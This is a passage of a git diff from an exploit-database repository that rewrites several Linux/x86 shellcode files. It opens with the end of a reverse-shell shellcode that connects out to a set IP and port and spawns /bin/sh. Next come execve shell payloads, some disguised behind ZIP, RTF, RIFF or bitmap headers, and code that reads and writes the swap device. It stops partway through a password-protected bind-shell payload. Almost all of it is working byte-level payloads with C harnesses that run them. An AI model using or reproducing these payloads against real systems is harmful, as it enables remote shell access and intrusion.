+pop %eax # 0x66 = socketcall
+push $0x1 #
+pop %ebx # socket() = 1
+xor %ecx,%ecx #
+push %ecx # 0
+push $0x1 # SOCK_STREAM = 1
+push $0x2 # AF_INET = 2
+mov %esp,%ecx # Arguments
+int $0x80 # EXECUTE - Now %eax have the s fileDescriptor
+
+# connect(s, [2, 64713, 127.127.127], 0x10)
+push $0x7f7f7f7f # 127.127.127 = 0x7f7f7f7f
+pushw $0xc9fc # PORT = 64713
+pushw $0x2 # AF_INET = 2
+mov %esp,%ecx # %ecx holds server struct
+push $0x10 # sizeof(server) = 10
+push %ecx # server struct
+push %eax # s fileDescriptor
+mov %esp,%ecx
+mov %eax,%esi # now %esi holds s fileDescriptor [for connect()]
+push $0x3 #
+pop %ebx # connect() = 3
+push $0x66 #
+pop %eax # 0x66 = socketcall
+int $0x80 # On success %eax = 0
+
+# dup2(s, 2) , dup2(s, 1) , dup2(s, 0)
+xchg %esi,%ebx # Put s fileDescriptor on %ebx [for dup2()]
+push $0x2
+pop %ecx
+dup_loop:
+mov $0x3f,%al # dup2() = 0x3f
+int $0x80
+dec %ecx
+jns dup_loop
+
+# execve("/bin//sh", ["/bin//sh",NULL])
+mov $0xb,%al # execve = 11d
+xor %edx,%edx
+push %edx
+push $0x68732f2f
+push $0x6e69622f
+mov %esp,%ebx
+push %edx
+push %ebx
+mov %esp, %ecx
+int $0x80
+
+*----------------------------------------------------------------------------*/
+
+char sc[] =
+"\x6a\x66" //push $0x66
+"\x58" //pop %eax
+"\x6a\x01" //push $0x1
+"\x5b" //pop %ebx
+"\x31\xc9" //xor %ecx,%ecx
+"\x51" //push %ecx
+"\x6a\x01" //push $0x1
+"\x6a\x02" //push $0x2
+"\x89\xe1" //mov %esp,%ecx
+"\xcd\x80" //int $0x80
+"\x68\x7f\x7f\x7f\x7f" //push $0x7f7f7f7f //IP
+"\x66\x68\xfc\xc9" //pushw $0xc9fc //PORT
+"\x66\x6a\x02" //pushw $0x2
+"\x89\xe1" //mov %esp,%ecx
+"\x6a\x10" //push $0x10
+"\x51" //push %ecx
+"\x50" //push %eax
+"\x89\xe1" //mov %esp,%ecx
+"\x89\xc6" //mov %eax,%esi
+"\x6a\x03" //push $0x3
+"\x5b" //pop %ebx
+"\x6a\x66" //push $0x66
+"\x58" //pop %eax
+"\xcd\x80" //int $0x80
+"\x87\xf3" //xchg %esi,%ebx
+"\x6a\x02" //push $0x2
+"\x59" //pop %ecx
+"\xb0\x3f" //mov $0x3f,%al
+"\xcd\x80" //int $0x80
+"\x49" //dec %ecx
+"\x79\xf9" //jns 34
+"\xb0\x0b" //mov $0xb,%al
+"\x31\xd2" //xor %edx,%edx
+"\x52" //push %edx
+"\x68\x2f\x2f\x73\x68" //push $0x68732f2f
+"\x68\x2f\x62\x69\x6e" //push $0x6e69622f
+"\x89\xe3" //mov %esp,%ebx
+"\x52" //push %edx
+"\x53" //push %ebx
+"\x89\xe1" //mov %esp,%ecx
+"\xcd\x80"; //int $0x80
+
+void SET_PORT(char *buf, int port) {
+ *(unsigned short *)(((buf)+24)) = (port);
+ char tmp = buf[24];
+ buf[24] = buf[25];
+ buf[25] = tmp;
+}
+
+void SET_IP(char *buf, char *ip) {
+ unsigned long backip = inet_addr(ip);
+ *(unsigned long *)(((buf)+18)) = (backip);
+}
+
+main(){
+ printf("size: %d bytes\n", strlen(sc));
+
+ SET_PORT(sc, 33333);
+ SET_IP(sc, "127.0.0.1");
+ __asm__("call sc");
+}
+
 // milw0rm.com [2006-05-08]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13365.c b/platforms/lin_x86/shellcode/13365.c
index 237ed6aac..bcabbe72e 100755
--- a/platforms/lin_x86/shellcode/13365.c
+++ b/platforms/lin_x86/shellcode/13365.c
@@ -1,32 +1,32 @@
-/*
- * [Linux/x86]
- * Shellcode for: execve("/bin/sh", ["/bin/sh"], NULL)
- * 24 bytes
- * hophet [at] gmail.com
- * http://www.nlabs.com.br/~hophet/
- *
- */
-
-char shellcode[] =
-
-"\x99" // cltd
-"\x31\xc0" // xor %eax,%eax
-"\x52" // push %edx
-"\x68\x6e\x2f\x73\x68" // push $0x68732f6e
-"\x68\x2f\x2f\x62\x69" // push $0x69622f2f
-"\x89\xe3" // mov %esp,%ebx
-"\x52" // push %edx
-"\x53" // push %ebx
-"\x89\xe1" // mov %esp,%ecx
-"\xb0\x0b" // mov $0xb,%al
-"\xcd\x80"; // int $0x80
-
-int main() {
-
- void (*p)();
- p = (void *)&shellcode;
- printf("Lenght: %d\n", strlen(shellcode));
- p();
-}
-
+/*
+ * [Linux/x86]
+ * Shellcode for: execve("/bin/sh", ["/bin/sh"], NULL)
+ * 24 bytes
+ * hophet [at] gmail.com
+ * http://www.nlabs.com.br/~hophet/
+ *
+ */
+
+char shellcode[] =
+
+"\x99" // cltd
+"\x31\xc0" // xor %eax,%eax
+"\x52" // push %edx
+"\x68\x6e\x2f\x73\x68" // push $0x68732f6e
+"\x68\x2f\x2f\x62\x69" // push $0x69622f2f
+"\x89\xe3" // mov %esp,%ebx
+"\x52" // push %edx
+"\x53" // push %ebx
+"\x89\xe1" // mov %esp,%ecx
+"\xb0\x0b" // mov $0xb,%al
+"\xcd\x80"; // int $0x80
+
+int main() {
+
+ void (*p)();
+ p = (void *)&shellcode;
+ printf("Lenght: %d\n", strlen(shellcode));
+ p();
+}
+
 // milw0rm.com [2006-05-01]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13367.c b/platforms/lin_x86/shellcode/13367.c
index 371c00cdc..6471d0df1 100755
--- a/platforms/lin_x86/shellcode/13367.c
+++ b/platforms/lin_x86/shellcode/13367.c
@@ -1,42 +1,42 @@
-/*
- * (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + ZIP Header - 28 bytes
- *
- * root@magicbox:~# file linux-sh-ziphdr.bin
- * linux-sh-ziphdr.bin: Zip archive data
- *
- * - izik
- */
-
-char shellcode[] =
-
- //
- // ZIP Header (5 bytes)
- //
-
- "\x50" // push %eax
- "\x4b" // dec %ebx
- "\x03\x04\x24" // add (%esp),%eax
-
- //
- // execve("/bin/sh", ["/bin/sh", NULL]);
- //
-
- "\x6a\x0b" // push $0xb
- "\x58" // pop %eax
- "\x99" // cltd
- "\x52" // push %edx
- "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
- "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
- "\x89\xe3" // mov %esp,%ebx
- "\x52" // push %edx
- "\x53" // push %ebx
- "\x89\xe1" // mov %esp,%ecx
- "\xcd\x80"; // int $0x80
-
-int main(int argc, char **argv) {
- int *ret;
- ret = (int *)&ret + 2;
- (*ret) = (int) shellcode;
-}
-
+/*
+ * (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + ZIP Header - 28 bytes
+ *
+ * root@magicbox:~# file linux-sh-ziphdr.bin
+ * linux-sh-ziphdr.bin: Zip archive data
+ *
+ * - izik
+ */
+
+char shellcode[] =
+
+ //
+ // ZIP Header (5 bytes)
+ //
+
+ "\x50" // push %eax
+ "\x4b" // dec %ebx
+ "\x03\x04\x24" // add (%esp),%eax
+
+ //
+ // execve("/bin/sh", ["/bin/sh", NULL]);
+ //
+
+ "\x6a\x0b" // push $0xb
+ "\x58" // pop %eax
+ "\x99" // cltd
+ "\x52" // push %edx
+ "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
+ "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
+ "\x89\xe3" // mov %esp,%ebx
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\x89\xe1" // mov %esp,%ecx
+ "\xcd\x80"; // int $0x80
+
+int main(int argc, char **argv) {
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int) shellcode;
+}
+
 // milw0rm.com [2006-04-17]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13368.c b/platforms/lin_x86/shellcode/13368.c
index 11a41f933..b64c1cee0 100755
--- a/platforms/lin_x86/shellcode/13368.c
+++ b/platforms/lin_x86/shellcode/13368.c
@@ -1,43 +1,43 @@
-/*
- * (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + RTF header - 30 bytes
- *
- * root@magicbox:~# file linux-sh-rtfhdr.bin
- * linux-sh-rtfhdr.bin: Rich Text Format data, version 1,
- *
- * - izik
- */
-
-char shellcode[] =
-
- //
- // RTF Header (7 bytes)
- // - Be careful not to trigger any of those expressions.
- //
-
- "\x7b\x5c" // jnp 80480d2 <_start+0x5e>
- "\x72\x74" // jb 80480ec <_start+0x78>
- "\x66\x31\xc0" // xor %ax,%ax
-
- //
- // execve("/bin/sh", ["/bin/sh", NULL]);
- //
-
- "\x6a\x0b" // push $0xb
- "\x58" // pop %eax
- "\x99" // cltd
- "\x52" // push %edx
- "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
- "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
- "\x89\xe3" // mov %esp,%ebx
- "\x52" // push %edx
- "\x53" // push %ebx
- "\x89\xe1" // mov %esp,%ecx
- "\xcd\x80"; // int $0x80
-
-int main(int argc, char **argv) {
- int *ret;
- ret = (int *)&ret + 2;
- (*ret) = (int) shellcode;
-}
-
+/*
+ * (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + RTF header - 30 bytes
+ *
+ * root@magicbox:~# file linux-sh-rtfhdr.bin
+ * linux-sh-rtfhdr.bin: Rich Text Format data, version 1,
+ *
+ * - izik
+ */
+
+char shellcode[] =
+
+ //
+ // RTF Header (7 bytes)
+ // - Be careful not to trigger any of those expressions.
+ //
+
+ "\x7b\x5c" // jnp 80480d2 <_start+0x5e>
+ "\x72\x74" // jb 80480ec <_start+0x78>
+ "\x66\x31\xc0" // xor %ax,%ax
+
+ //
+ // execve("/bin/sh", ["/bin/sh", NULL]);
+ //
+
+ "\x6a\x0b" // push $0xb
+ "\x58" // pop %eax
+ "\x99" // cltd
+ "\x52" // push %edx
+ "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
+ "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
+ "\x89\xe3" // mov %esp,%ebx
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\x89\xe1" // mov %esp,%ecx
+ "\xcd\x80"; // int $0x80
+
+int main(int argc, char **argv) {
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int) shellcode;
+}
+
 // milw0rm.com [2006-04-17]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13369.c b/platforms/lin_x86/shellcode/13369.c
index 4e96d845d..7bf0d69e6 100755
--- a/platforms/lin_x86/shellcode/13369.c
+++ b/platforms/lin_x86/shellcode/13369.c
@@ -1,44 +1,44 @@
-/*
- * (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + RIFF Header - 28 bytes
- *
- * root@magicbox:~# file linux-sh-riffhdr.bin
- * linux-sh-riffhdr.bin: RIFF (little-endian) data
- *
- * - izik
- */
-
-char shellcode[] =
-
- //
- // RIFF Header (5 bytes)
- //
-
- "\x52" // push %edx
- "\x49" // dec %ecx
- "\x46" // inc %esi
- "\x46" // inc %esi
- "\x40" // inc %eax
-
- //
- // execve("/bin/sh", ["/bin/sh", NULL]);
- //
-
- "\x6a\x0b" // push $0xb
- "\x58" // pop %eax
- "\x99" // cltd
- "\x52" // push %edx
- "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
- "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
- "\x89\xe3" // mov %esp,%ebx
- "\x52" // push %edx
- "\x53" // push %ebx
- "\x89\xe1" // mov %esp,%ecx
- "\xcd\x80"; // int $0x80
-
-int main(int argc, char **argv) {
- int *ret;
- ret = (int *)&ret + 2;
- (*ret) = (int) shellcode;
-}
-
+/*
+ * (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + RIFF Header - 28 bytes
+ *
+ * root@magicbox:~# file linux-sh-riffhdr.bin
+ * linux-sh-riffhdr.bin: RIFF (little-endian) data
+ *
+ * - izik
+ */
+
+char shellcode[] =
+
+ //
+ // RIFF Header (5 bytes)
+ //
+
+ "\x52" // push %edx
+ "\x49" // dec %ecx
+ "\x46" // inc %esi
+ "\x46" // inc %esi
+ "\x40" // inc %eax
+
+ //
+ // execve("/bin/sh", ["/bin/sh", NULL]);
+ //
+
+ "\x6a\x0b" // push $0xb
+ "\x58" // pop %eax
+ "\x99" // cltd
+ "\x52" // push %edx
+ "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
+ "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
+ "\x89\xe3" // mov %esp,%ebx
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\x89\xe1" // mov %esp,%ecx
+ "\xcd\x80"; // int $0x80
+
+int main(int argc, char **argv) {
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int) shellcode;
+}
+
 // milw0rm.com [2006-04-17]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13370.c b/platforms/lin_x86/shellcode/13370.c
index ce9942125..2e4e35770 100755
--- a/platforms/lin_x86/shellcode/13370.c
+++ b/platforms/lin_x86/shellcode/13370.c
@@ -1,43 +1,43 @@
-/*
- * (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + Bitmap 24bit Header - 27 bytes
- *
- * root@magicbox:~# file linux-sh-bm24bhdr.bin
- * linux-sh-bm24bhdr.bin: PC bitmap data
- *
- * - izik
- */
-
-char shellcode[] =
-
- //
- // Bitmap 24bit Header (4 bytes)
- //
-
- "\x42" // inc %edx
- "\x4d" // dec %ebp
- "\x36" // ss
- "\x91" // xchg %eax,%ecx
-
- //
- // execve("/bin/sh", ["/bin/sh", NULL]);
- //
-
- "\x6a\x0b" // push $0xb
- "\x58" // pop %eax
- "\x99" // cltd
- "\x52" // push %edx
- "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
- "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
- "\x89\xe3" // mov %esp,%ebx
- "\x52" // push %edx
- "\x53" // push %ebx
- "\x89\xe1" // mov %esp,%ecx
- "\xcd\x80"; // int $0x80
-
-int main(int argc, char **argv) {
- int *ret;
- ret = (int *)&ret + 2;
- (*ret) = (int) shellcode;
-}
-
+/*
+ * (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + Bitmap 24bit Header - 27 bytes
+ *
+ * root@magicbox:~# file linux-sh-bm24bhdr.bin
+ * linux-sh-bm24bhdr.bin: PC bitmap data
+ *
+ * - izik
+ */
+
+char shellcode[] =
+
+ //
+ // Bitmap 24bit Header (4 bytes)
+ //
+
+ "\x42" // inc %edx
+ "\x4d" // dec %ebp
+ "\x36" // ss
+ "\x91" // xchg %eax,%ecx
+
+ //
+ // execve("/bin/sh", ["/bin/sh", NULL]);
+ //
+
+ "\x6a\x0b" // push $0xb
+ "\x58" // pop %eax
+ "\x99" // cltd
+ "\x52" // push %edx
+ "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
+ "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
+ "\x89\xe3" // mov %esp,%ebx
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\x89\xe1" // mov %esp,%ecx
+ "\xcd\x80"; // int $0x80
+
+int main(int argc, char **argv) {
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int) shellcode;
+}
+
 // milw0rm.com [2006-04-17]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13371.c b/platforms/lin_x86/shellcode/13371.c
index 754a2997c..da03fed46 100755
--- a/platforms/lin_x86/shellcode/13371.c
+++ b/platforms/lin_x86/shellcode/13371.c
@@ -1,112 +1,112 @@
-/*
- * linux-x86-swap-restore.c - SWAP restore shellcode 109 bytes for Linux/x86
- * Copyright (c) 2006 Gotfault Security & rfdslabs
- *
- * Authors:
- *
- * dx
- * spud
- *
- * This shellcode reads the swap device at offset 31337. After it searchs by
- * NULL byte, it stops and write the readed content to '/tmp/swr' file.
- * Probaly you needs to change the device path name in open() device syscall.
- *
- */
-
-char shellcode[] =
-
- /* open(device, O_RDONLY) */
-
- "\x6a\x05" // push $0x5
- "\x58" // pop %eax
- "\x99" // cltd
- "\x52" // push %edx
- "\x68\x73\x64\x61\x31" // push $0x31616473
- "\x68\x64\x65\x76\x2f" // push $0x2f766564
- "\x66\x68\x2f\x2f" // pushw $0x2f2f
- "\x89\xe3" // mov %esp,%ebx
- "\x52" // push %edx
- "\x59" // pop %ecx
- "\xcd\x80" // int $0x80
-
- "\x93" // xchg %eax,%ebx
-
- /* lseek(fd_device, 31337, SEEK_SET) */
-
- "\x31\xc9" // xor %ecx,%ecx
- "\x6a\x13" // push $0x13
- "\x58" // pop %eax
- "\x66\xb9\x69\x7a" // mov $0x7a69,%cx
- "\xcd\x80" // int $0x80
-
- /* read(fd_device, *buf, 1025) */
-
- "\x89\xe1" // mov %esp,%ecx
- "\x42" // inc %edx
- "\xc1\xe2\x0a" // shl $0xa,%edx
- "\x42" // inc %edx
- "\x6a\x03" // push $0x3
- "\x58" // pop %eax
- "\xcd\x80" // int $0x80
-
- "\x89\xe6" // mov %esp,%esi
- "\x99" // cltd
- "\x31\xff" // xor %edi,%edi
-
- /* counter loop - read each byte and searchs by 0x0. */
-
- "\xac" // lods %ds
- "\x38\xd0" // cmp %dl,%al
- "\x74\x04" // je 80480b3
- "\x47" // inc %edi
- "\xeb\xf8" // jmp 80480aa
-
- "\x91" // xchg %eax,%ecx
-
- /* close(fd_device) */
-
- "\x6a\x06" // push $0x6
- "\x58" // pop %eax
- "\xcd\x80" // int $0x80
- "\x89\xe6" // mov %esp,%esi
-
- /* open("/tmp/swr", O_CREAT|O_APPEND|O_WRONLY) */
-
- "\x66\xb9\x41\x04" // mov $0x441,%cx
- "\x52" // push %edx
- "\x68\x2f\x73\x77\x72" // push $0x7277732f
- "\x68\x2f\x74\x6d\x70" // push $0x706d742f
- "\x89\xe3" // mov %esp,%ebx
- "\xb0\x05" // mov $0x5,%al
- "\xcd\x80" // int $0x80
-
- "\x93" // xchg %eax,%ebx
-
- /* write(fd_filename, *buf, sizeof(buffer)) */
-
- "\x6a\x04" // push $0x4
- "\x58" // pop %eax
- "\x56" // push %esi
- "\x59" // pop %ecx
- "\x89\xfa" // mov %edi,%edx
- "\xcd\x80" // int $0x80
-
- /* close(fd_filename) */
-
- "\xb0\x06" // mov $0x6,%al
- "\xcd\x80" // int $0x80
-
- /* exit(anything) */
-
- "\xb0\x01" // mov $0x1,%al
- "\xcd\x80" // int $0x80
-;
-
-int main() {
-
- int (*f)() = (int(*)())shellcode;
- printf("Length: %u\n", strlen(shellcode));
- f();
-}
-
+/*
+ * linux-x86-swap-restore.c - SWAP restore shellcode 109 bytes for Linux/x86
+ * Copyright (c) 2006 Gotfault Security & rfdslabs
+ *
+ * Authors:
+ *
+ * dx
+ * spud
+ *
+ * This shellcode reads the swap device at offset 31337. After it searchs by
+ * NULL byte, it stops and write the readed content to '/tmp/swr' file.
+ * Probaly you needs to change the device path name in open() device syscall.
+ *
+ */
+
+char shellcode[] =
+
+ /* open(device, O_RDONLY) */
+
+ "\x6a\x05" // push $0x5
+ "\x58" // pop %eax
+ "\x99" // cltd
+ "\x52" // push %edx
+ "\x68\x73\x64\x61\x31" // push $0x31616473
+ "\x68\x64\x65\x76\x2f" // push $0x2f766564
+ "\x66\x68\x2f\x2f" // pushw $0x2f2f
+ "\x89\xe3" // mov %esp,%ebx
+ "\x52" // push %edx
+ "\x59" // pop %ecx
+ "\xcd\x80" // int $0x80
+
+ "\x93" // xchg %eax,%ebx
+
+ /* lseek(fd_device, 31337, SEEK_SET) */
+
+ "\x31\xc9" // xor %ecx,%ecx
+ "\x6a\x13" // push $0x13
+ "\x58" // pop %eax
+ "\x66\xb9\x69\x7a" // mov $0x7a69,%cx
+ "\xcd\x80" // int $0x80
+
+ /* read(fd_device, *buf, 1025) */
+
+ "\x89\xe1" // mov %esp,%ecx
+ "\x42" // inc %edx
+ "\xc1\xe2\x0a" // shl $0xa,%edx
+ "\x42" // inc %edx
+ "\x6a\x03" // push $0x3
+ "\x58" // pop %eax
+ "\xcd\x80" // int $0x80
+
+ "\x89\xe6" // mov %esp,%esi
+ "\x99" // cltd
+ "\x31\xff" // xor %edi,%edi
+
+ /* counter loop - read each byte and searchs by 0x0. */
+
+ "\xac" // lods %ds
+ "\x38\xd0" // cmp %dl,%al
+ "\x74\x04" // je 80480b3
+ "\x47" // inc %edi
+ "\xeb\xf8" // jmp 80480aa
+
+ "\x91" // xchg %eax,%ecx
+
+ /* close(fd_device) */
+
+ "\x6a\x06" // push $0x6
+ "\x58" // pop %eax
+ "\xcd\x80" // int $0x80
+ "\x89\xe6" // mov %esp,%esi
+
+ /* open("/tmp/swr", O_CREAT|O_APPEND|O_WRONLY) */
+
+ "\x66\xb9\x41\x04" // mov $0x441,%cx
+ "\x52" // push %edx
+ "\x68\x2f\x73\x77\x72" // push $0x7277732f
+ "\x68\x2f\x74\x6d\x70" // push $0x706d742f
+ "\x89\xe3" // mov %esp,%ebx
+ "\xb0\x05" // mov $0x5,%al
+ "\xcd\x80" // int $0x80
+
+ "\x93" // xchg %eax,%ebx
+
+ /* write(fd_filename, *buf, sizeof(buffer)) */
+
+ "\x6a\x04" // push $0x4
+ "\x58" // pop %eax
+ "\x56" // push %esi
+ "\x59" // pop %ecx
+ "\x89\xfa" // mov %edi,%edx
+ "\xcd\x80" // int $0x80
+
+ /* close(fd_filename) */
+
+ "\xb0\x06" // mov $0x6,%al
+ "\xcd\x80" // int $0x80
+
+ /* exit(anything) */
+
+ "\xb0\x01" // mov $0x1,%al
+ "\xcd\x80" // int $0x80
+;
+
+int main() {
+
+ int (*f)() = (int(*)())shellcode;
+ printf("Length: %u\n", strlen(shellcode));
+ f();
+}
+
 // milw0rm.com [2006-04-16]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13372.c b/platforms/lin_x86/shellcode/13372.c
index d5b399eb5..8f29d8e9a 100755
--- a/platforms/lin_x86/shellcode/13372.c
+++ b/platforms/lin_x86/shellcode/13372.c
@@ -1,106 +1,106 @@
-/*
- * linux-x86-swap-store.c - SWAP store shellcode 99 bytes for Linux/x86
- * Copyright (c) 2006 Gotfault Security & rfdslabs
- *
- * Authors:
- *
- * dx
- * spud
- *
- * This shellcode reads the content of '/tmp/sws' and stores on swap
- * device at offset 31337. Probaly needs to change the device path name
- * in open() device syscall.
- *
- */
-
-char shellcode[] =
-
- /* open(device, O_WRONLY) */
-
- "\x6a\x05" // push $0x5
- "\x58" // pop %eax
- "\x99" // cltd
- "\x52" // push %edx
- "\x68\x73\x64\x61\x31" // push $0x31616473
- "\x68\x64\x65\x76\x2f" // push $0x2f766564
- "\x66\x68\x2f\x2f" // pushw $0x2f2f
- "\x89\xe3" // mov %esp,%ebx
- "\x6a\x01" // push $0x1
- "\x59" // pop %ecx
- "\xcd\x80" // int $0x80
-
- "\x97" // xchg %eax,%edi
-
- /* open("/tmp/sws", O_RDONLY) */
-
- "\x49" // dec %ecx
- "\x52" // push %edx
- "\x68\x2f\x73\x77\x73" // push $0x7377732f
- "\x68\x2f\x74\x6d\x70" // push $0x706d742f
- "\x89\xe3" // mov %esp,%ebx
- "\x6a\x05" // push $0x5
- "\x58" // pop %eax
- "\xcd\x80" // int $0x80
-
- "\x93" // xchg %eax,%ebx
-
- /* read(fd_filename, *buf, 256) */
-
- "\x89\xe1" // mov %esp,%ecx
- "\x42" // inc %edx
- "\xc1\xe2\x0a" // shl $0xa,%edx
- "\x6a\x03" // push $0x3
- "\x58" // pop %eax
- "\xcd\x80" // int $0x80
-
- "\x96" // xchg %eax,%esi
-
- /* close(fd_filename) */
-
- "\x6a\x06" // push $0x6
- "\x58" // pop %eax
- "\xcd\x80" // int $0x80
-
- "\x92" // xchg %eax,%edx
-
- /* lseek(fd_device, 31337, SEEK_SET) */
-
- "\x31\xc9" // xor %ecx,%ecx
- "\x6a\x13" // push $0x13
- "\x58" // pop %eax
- "\x89\xfb" // mov %edi,%ebx
- "\x66\xb9\x69\x7a" // mov $0x7a69,%cx
- "\xcd\x80" // int $0x80
-
- /* write(fd_device, *buf, 1025) */
-
-
- "\x89\x14\x34" // mov %edx,(%esp,%esi,1)
- "\x6a\x04" // push $0x4
- "\x58" // pop %eax
- "\x54" // push %esp
- "\x59" // pop %ecx
- "\x56" // push %esi
- "\x5a" // pop %edx
- "\x42" // inc %edx
- "\xcd\x80" // int $0x80
-
- /* close(fd_device) */
-
- "\xb0\x06" // mov $0x6,%al
- "\xcd\x80" // int $0x80
-
- /* exit(anything) */
-
- "\xb0\x01" // mov $0x1,%al
- "\xcd\x80" // int $0x80
-;
-
-int main() {
-
- int (*f)() = (int(*)())shellcode;
- printf("Length: %u\n", strlen(shellcode));
- f();
-}
-
+/*
+ * linux-x86-swap-store.c - SWAP store shellcode 99 bytes for Linux/x86
+ * Copyright (c) 2006 Gotfault Security & rfdslabs
+ *
+ * Authors:
+ *
+ * dx
+ * spud
+ *
+ * This shellcode reads the content of '/tmp/sws' and stores on swap
+ * device at offset 31337. Probaly needs to change the device path name
+ * in open() device syscall.
+ *
+ */
+
+char shellcode[] =
+
+ /* open(device, O_WRONLY) */
+
+ "\x6a\x05" // push $0x5
+ "\x58" // pop %eax
+ "\x99" // cltd
+ "\x52" // push %edx
+ "\x68\x73\x64\x61\x31" // push $0x31616473
+ "\x68\x64\x65\x76\x2f" // push $0x2f766564
+ "\x66\x68\x2f\x2f" // pushw $0x2f2f
+ "\x89\xe3" // mov %esp,%ebx
+ "\x6a\x01" // push $0x1
+ "\x59" // pop %ecx
+ "\xcd\x80" // int $0x80
+
+ "\x97" // xchg %eax,%edi
+
+ /* open("/tmp/sws", O_RDONLY) */
+
+ "\x49" // dec %ecx
+ "\x52" // push %edx
+ "\x68\x2f\x73\x77\x73" // push $0x7377732f
+ "\x68\x2f\x74\x6d\x70" // push $0x706d742f
+ "\x89\xe3" // mov %esp,%ebx
+ "\x6a\x05" // push $0x5
+ "\x58" // pop %eax
+ "\xcd\x80" // int $0x80
+
+ "\x93" // xchg %eax,%ebx
+
+ /* read(fd_filename, *buf, 256) */
+
+ "\x89\xe1" // mov %esp,%ecx
+ "\x42" // inc %edx
+ "\xc1\xe2\x0a" // shl $0xa,%edx
+ "\x6a\x03" // push $0x3
+ "\x58" // pop %eax
+ "\xcd\x80" // int $0x80
+
+ "\x96" // xchg %eax,%esi
+
+ /* close(fd_filename) */
+
+ "\x6a\x06" // push $0x6
+ "\x58" // pop %eax
+ "\xcd\x80" // int $0x80
+
+ "\x92" // xchg %eax,%edx
+
+ /* lseek(fd_device, 31337, SEEK_SET) */
+
+ "\x31\xc9" // xor %ecx,%ecx
+ "\x6a\x13" // push $0x13
+ "\x58" // pop %eax
+ "\x89\xfb" // mov %edi,%ebx
+ "\x66\xb9\x69\x7a" // mov $0x7a69,%cx
+ "\xcd\x80" // int $0x80
+
+ /* write(fd_device, *buf, 1025) */
+
+
+ "\x89\x14\x34" // mov %edx,(%esp,%esi,1)
+ "\x6a\x04" // push $0x4
+ "\x58" // pop %eax
+ "\x54" // push %esp
+ "\x59" // pop %ecx
+ "\x56" // push %esi
+ "\x5a" // pop %edx
+ "\x42" // inc %edx
+ "\xcd\x80" // int $0x80
+
+ /* close(fd_device) */
+
+ "\xb0\x06" // mov $0x6,%al
+ "\xcd\x80" // int $0x80
+
+ /* exit(anything) */
+
+ "\xb0\x01" // mov $0x1,%al
+ "\xcd\x80" // int $0x80
+;
+
+int main() {
+
+ int (*f)() = (int(*)())shellcode;
+ printf("Length: %u\n", strlen(shellcode));
+ f();
+}
+
 // milw0rm.com [2006-04-16]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13373.c b/platforms/lin_x86/shellcode/13373.c
index e608841f6..f33a5bf0d 100755
--- a/platforms/lin_x86/shellcode/13373.c
+++ b/platforms/lin_x86/shellcode/13373.c
@@ -1,136 +1,136 @@
-/*
- * linux-x86-authportbind.c - AUTH portbind shellcode 166 bytes for Linux/x86
- * Copyright (c) 2006 Gotfault Security
- *
- * portbind shellcode that bind()'s a shell on port 64713/tcp
- * and requests a user password.
- *
- */
-
-char shellcode[] =
-
- /* socket(AF_INET, SOCK_STREAM, 0) */
-
- "\x6a\x66" // push $0x66
- "\x58" // pop %eax
- "\x6a\x01" // push $0x1
- "\x5b" // pop %ebx
- "\x99" // cltd
- "\x52" // push %edx
- "\x53" // push %ebx
- "\x6a\x02" // push $0x2
- "\x89\xe1" // mov %esp,%ecx
- "\xcd\x80" // int $0x80
-
- /* bind(s, server, sizeof(server)) */
-
- "\x52" // push %edx
- "\x66\x68\xfc\xc9" // pushw $0xc9fc // PORT = 64713
- "\x66\x6a\x02" // pushw $0x2
- "\x89\xe1" // mov $esp,%ecx
- "\x6a\x10" // push $0x10
- "\x51" // push %ecx
- "\x50" // push %eax
- "\x89\xe1" // mov %esp,%ecx
- "\x89\xc6" // mov %eax,%esi
- "\x43" // inc %ebx
- "\xb0\x66" // mov $0x66,%al
- "\xcd\x80" // int $0x80
-
- /* listen(s, anything) */
-
- "\xb0\x66" // mov $0x66,%al
- "\xd1\xe3" // shl %ebx
- "\xcd\x80" // int $0x80
-
- /* accept(s, 0, 0) */
-
- "\x52" // push %edx
- "\x52" // push %edx
- "\x56" // push %esi
- "\x89\xe1" // mov %esp,%ecx
- "\x43" // inc %ebx
- "\xb0\x66" // mov $0x66,%al
- "\xcd\x80" // int $0x80
-
- "\x96" // xchg %eax,%esi
-
- /* send(s, "Password: ", 0x0a, flags) */
-
- "\x52" // push %edx
- "\x68\x72\x64\x3a\x20" // push $0x203a6472
- "\x68\x73\x73\x77\x6f" // push $0x6f777373
